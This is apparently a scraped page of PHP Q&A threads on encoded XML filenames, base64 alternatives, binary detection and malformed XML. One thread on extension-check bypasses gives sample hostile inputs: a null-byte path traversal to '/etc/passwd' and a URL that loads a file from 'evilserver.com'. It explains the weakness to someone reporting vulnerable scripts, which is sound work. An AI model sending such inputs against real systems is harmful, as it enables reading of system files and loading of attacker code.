PHP - DOMDocument load XML with encoded name

PHP - DOMDocument load XML with encoded name - php

Lets say that in my flash project I have script that create for me xml files dynamically (by PHP). XML file name is based on specific variable and escaped using escape(variable) in case that variable may (and mostly do) contains unsupported filename chars...
I need to know precise name of xml file later in my flash project, because I'm loading these XML files only if unescape(XMLfile) == variable . There's a lot of variables, so I can't just use String.replace() function to wipe out unsuported fileneme chars...
There's part of PHP file I'm using:
$XMLDom = new DomDocument('1.0', 'UTF-8');
$xmlId = trim($_POST['xmlId']);
if(file_exists($xmlId)){
$XMLDom ->load($xmlId);
}else{
$newXMLHandler = fopen($xmlId, 'w') or die("can't open file");
fclose($newXMLHandler);
$XMLDom ->load($xmlId);
.... rest of the code ....
$XMLDom ->save($xmlId);
}
The result of the code above is that in directory are 2 newly created XML files
One XML empty created by fopen($xmlId, 'w'), named: "fi%20le%2C%2E%40.xml"
and second one named: "fi le,.#.xml" where all my new XML data is stored...
Is there any way to load escaped named XML file by PHP?
Thanks in advance.
Arthur.

I don't feel quite confident I understand your problem, but if your question was to find the analogue function to escape() in PHP, then urlencode() looks like the best match, but you need to research what exactly is being escaped. Note, for example, that there are several different ways to percent-encode strings, especially the multibyte strings. Flash may use escapeMultibyte() or it can also use encodeURIComponent() both encode different subsets of characters, and differently - so beware!
Now, regarding file names, if your HTTP server is running on Unix system, than "fi le,.#.xml" is a valid file name, nothing to worry about - inconvenient some times, but it is a legitimate name.
touch 'fi le,.#.xml'
would create a file, no problems there. Basically, the restricted characters are the slashes and the null character ("\x00"), but it is common to restrict also the characters that may be interpreted as shell commands - this is really up to you.

Related

Which special characters can cause a file path to be misinterpreted?

For example, there is function (pseudo code):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
but is it possible, that hacker in a some way, used a special symbol/method, i.e.:
path=file.php^example.mp3
or
path=file.php+example.mp3
or etc...
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
p.s. DONT POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, as I AM TO REPORT MANY SCRIPTS for this issue (if this is really an issue).

if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
Yes, such a symbol exists; it is called the 'null byte' ("\0").
Because in C (the language used to write the PHP engine) the end of a 'string' is signalled by the null byte. So, whenever a null byte is encountered, the string will end.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.

The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character its how you work with your data. So you shouldn't use a path given by a user because the user can manipulate the path or other variables.
To escape a user input to prevent bad characters you can use htmlspecialchars or you can filter your get input with filter_input something like that:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

WE CAN'T TELL IF YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether its possible to trick PHP into processing a file it shouldn't based on the end of the string, then the answer is only if there is another file somewhere else which has the same ending. However, by default, PHP will happily read from URLs using the same functionality as reading from local files, consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3

PHP - alternative to Base64 with shorter results?

I'm currently using base64 to encode a short string and decode it later, and wonder if a better (shorter) alternative is possible.
$string = '/path/to/img/image.jpg';
$convertedString = base64_encode($string);
// New session, new user
$convertedString = 'L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==';
$originalString = base64_decode('L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==');
// Can $convertedString be shorter by any means ?
Requirements :
Shorter result possible
Must be reversible any time in a different session (therefore unique)
No security needed (anyone can guess it)
Any kind of characters that can be used in a URL (except slashes)
Can be an external lib
Goal :
Get a clean unique id from a path file that is not the path file and can be used in a URL, without using a database.
I've searched and read a lot, looks like it doesn't exist but couldn't find a definitive answer.

Well since you're using these in a URL, why not use rawurlencode($string) and rawurldecode($encodedString)?
If you can reserve one character like - (i.e., ensure that - never appears in your file names), you can do even better by doing rawurlencode(str_replace('/', '-', $string)) and str_replace('-', '/', rawurldecode($encodedString)). Depending on the file names you pick, this will create IDs that are the same length as the original filename. (This won't work if your file names have multi-byte characters in them; you will need to use some mb_* functions for that case.)
You could try using compression functions, but for strings as short as file paths, compression usually makes the output larger than the input.
Ultimately, unless you are willing to use a database, disallow certain file names, or you know something about what kinds of file names will come up, the best you can hope for is IDs that are as short or almost as short as the original file names. Otherwise, this would be a universal compression function, which is impossible.

I don't think there is anything reliable out there that would significantly shorten the encoded string and keep it URL friendly.
e.g. if you use something like
$test = gzcompress(base64_encode($parameter), 9, ZLIB_ENCODING_DEFLATE);
echo $test;
it would generate characters that are not URL-friendly and any post-transformation would be just a risky mess.
However, you can easily transform text to get URL-friendly parameters.
I use the following code to generate URL-friendly parameters:
$encodedParameter = urlencode(base64_encode($parameter));
And the following code to decode it:
$parameter = base64_decode(urldecode($encodedParameter));
As an alternative solution, you could use generated tokens to map known files using some database.

Extract XML from .prt file using PHP but file becomes unreadable when opened with PHP

I have a .prt (CAD Design File) that I need to extract some XML from using PHP. When I view this file directly in the browser, I can see the XML along with some unreadable areas. However, when I go to open it using PHP to get the XML I need from it, the file becomes mostly unreadable and the XML is no where to be found as the file looks like it was encrypted.
This is an example of what the .prt file looks like when opened directly in the browser: File in Browser
This is an example of what the file looks like when opened using PHP: Using PHP
This is how I am trying to open the file with PHP:
$handle = fopen("thePart.prt", "rb");
$contents = trim(stream_get_contents($handle));
fclose($handle);
//echo out contents to see what happens
echo $contents;
If I could get this file to open without doing what it is doing, I can get the XML out of it myself. How do I fix the issue that I am having? Thank you very much in advance.

Real Answer
Turns out that there was no problem at all with the code. The browser was just interpreting the XML tags as HTML and so the data was not displayed (PHP by default sets a content type of text/html). When viewing the source code, the XML was plain and visible. The XML can also be seen without viewing the source by setting the content type of the php file:
header('Content-Type: text/plain');
This way, the browser will just display the XML as it is, without attempting to parse it as HTML first.
Initial Answer
Just a guess here, but it might be that you're opening the file in binary mode (the "rb" in your first line of code. Try opening it as a plain text file (use "r" instead of "rb").
More likely, it's an encoding issue where PHP is trying to decode a UTF-8 file as ASCII, for instance. Since you are opening a binary file (CAD Design File is binary with a little XML, I'm assuming), PHP might be getting confused while trying to detect the encoding of the file. I would need a copy of the file to know for sure.
Try comparing the result of mb_detect_encoding:
mb_detect_encoding($contents)
and the actual encoding of the XML data within the .prt file. If they are different, that's how you know that PHP is using the wrong encoding. In that case, use mb_convert_encoding to convert from PHP's detected encoding to that of the XML data.

Determine if a PHP resource contains binary or text

I am using MongoDB and storing files into GridFS using PHP. I am pulling files out via:
$mongo = new Mongo;
$images = $monogo->my_db->getGridFS('images');
$image = $images->findOne('epic-beard-man.png');
$stream = $image->getResource();
Which is cool, because $stream is a PHP resource. The thing I need, is to determine if the stream/resource is binary or text. If it is text, I want to output it, otherwise if it is binary, I don't want to output it.
Is there a magical function like: is_binary($stream)
EDIT
echo get_resource_type($stream);
Returns STREAM. Hum, not very useful.

You cannot check this without actually reading from the resource. You can read the whole thing and look for non-printable characters (which should happen pretty fast if it is an image). You can check for "printability" with ctype_print, which will unfortunately return false for tabs and newlines, so it may not be the best one after all. You can also build your own regex to check the data:
preg_match(':^(\P{Cc}|[\t\n])*$:', $data)
The best and easiest thing to do is however to save the data type, possibly the MIME type, together with the object. That way you do not need to do anything magic at display time.
I think that schemaless databases like MongoDB needs at least as much care in the design stage as relational databases. This is a typical thing to think about when designing a database: what type do my data have?

XML not well formed error

I have a php script that writes xml data to a file and another one that sends the contents of this file to the client as the response.
But on the client side,im getting the following error:
XML Parsing Error: not well-formed
When i view source of the page, the XML i see is as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<books><date>December 24th, 2009</date><total>2</total><book><name>Book 1</name><url>http://www.mydomain.com/posters/68370/img.jpg</url></book><book><name>Book 2</name><url>http://www.anotherdomain.com/posters/76198/img1.jpg</url></book></books>
In file1.php i have the following code that writes the XML to a file :
$file= fopen("book_results.xml", "w");
$xml_writer = new XMLWriter();
$xml_writer->openMemory();
$xml_writer->startDocument('1.0', 'UTF-8', 'yes');
$xml_writer->startElement('books');
$xml_writer->writeElement('date',get_current_date()); // Like December 23rd, 2009
$xml_writer->writeElement('total',$totalResults);
foreach($bookList as $key => $value) { /* $bookList contains key value pairs */
$xml_writer->startElement('book');
$xml_writer->writeElement('name',$key);
$xml_writer->writeElement('url',$value);
$xml_writer->endElement(); //book
}
$xml_writer->endElement(); //books
$xml_data = $xml_writer->outputMemory();
fwrite($file,$xml_data);
fclose($file);
And in index.php, i have the following code to send the contents of the file as a response
<?php
//Send the xml file contents as response
header('Content-type: text/xml');
readfile('book_results.xml');
?>
What could be causing the error ?
Please help.
Thank You.

The above looks good to me (including the fact that you're forming the XML via a dedicated component) and either:
what you're using to validate this is wrong
you're looking at something different to what you think you are
I would definitely try another tool/browser/whatever to validate this. Additionally, you may want to save the XML file as sent to the browser, and check it using XMLStarlet (a command-line XML toolkit).
I'm wondering also if it's an issue that we can't easily see - a character encoding problem or a Byte-Order-Mark issue (related to encodings). Does the character encoding of the web page you're sending match/differ from the encoding of the XML (UTF-8).

There are some free websites and tools for checking for validity in XML.
According to the XML Validator, when I pasted your XML above into the textarea, it said "no errors found".
However, Validome says "Can not find declaration of element 'books'."
Perhaps Jeff's suggestion of changing date and total to attributes might help. It would probably be easy to try that.

Have you tried using those 2 loose date and total tags as attributes instead?:
<books date="December 24th" total="2">
Also, xml can be quite sensitive. Make sure to use CDATA tags were appropriate

It validates fine in WMHelp XMLPad 3.0.1.0, and opens fine in FireFox 3.0.8 and IE7 without errors.
The only thing I can see, from a copy and paste of your XML, is that the XML declaration is followed by a CR/LF combination (0x0D0x0A). This is platform specific (Windows), and may be an issue on the client; you didn't mention what the client was, however, so I can't be sure if that's the problem.

Ensure that you are writing UTF-8 or 7-bit ASCII encoding to the file (test with a text editor or the 'file' command, if you have it), and that your checker supports it. Keep in mind that UTF-8 can include a signature (sometimes called the byte-order mark) in the first three bytes (EF BB BF) that sometimes confuses some tools if it is there, and rarely if it is not.

xml version='1.0' encoding='UTF-8' standalone='yes'
use single quote.

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.

PHP - DOMDocument load XML with encoded name - php

Related

Which special characters can cause a file path to be misinterpreted?

PHP - alternative to Base64 with shorter results?

Extract XML from .prt file using PHP but file becomes unreadable when opened with PHP

Determine if a PHP resource contains binary or text

XML not well formed error

Categories

Resources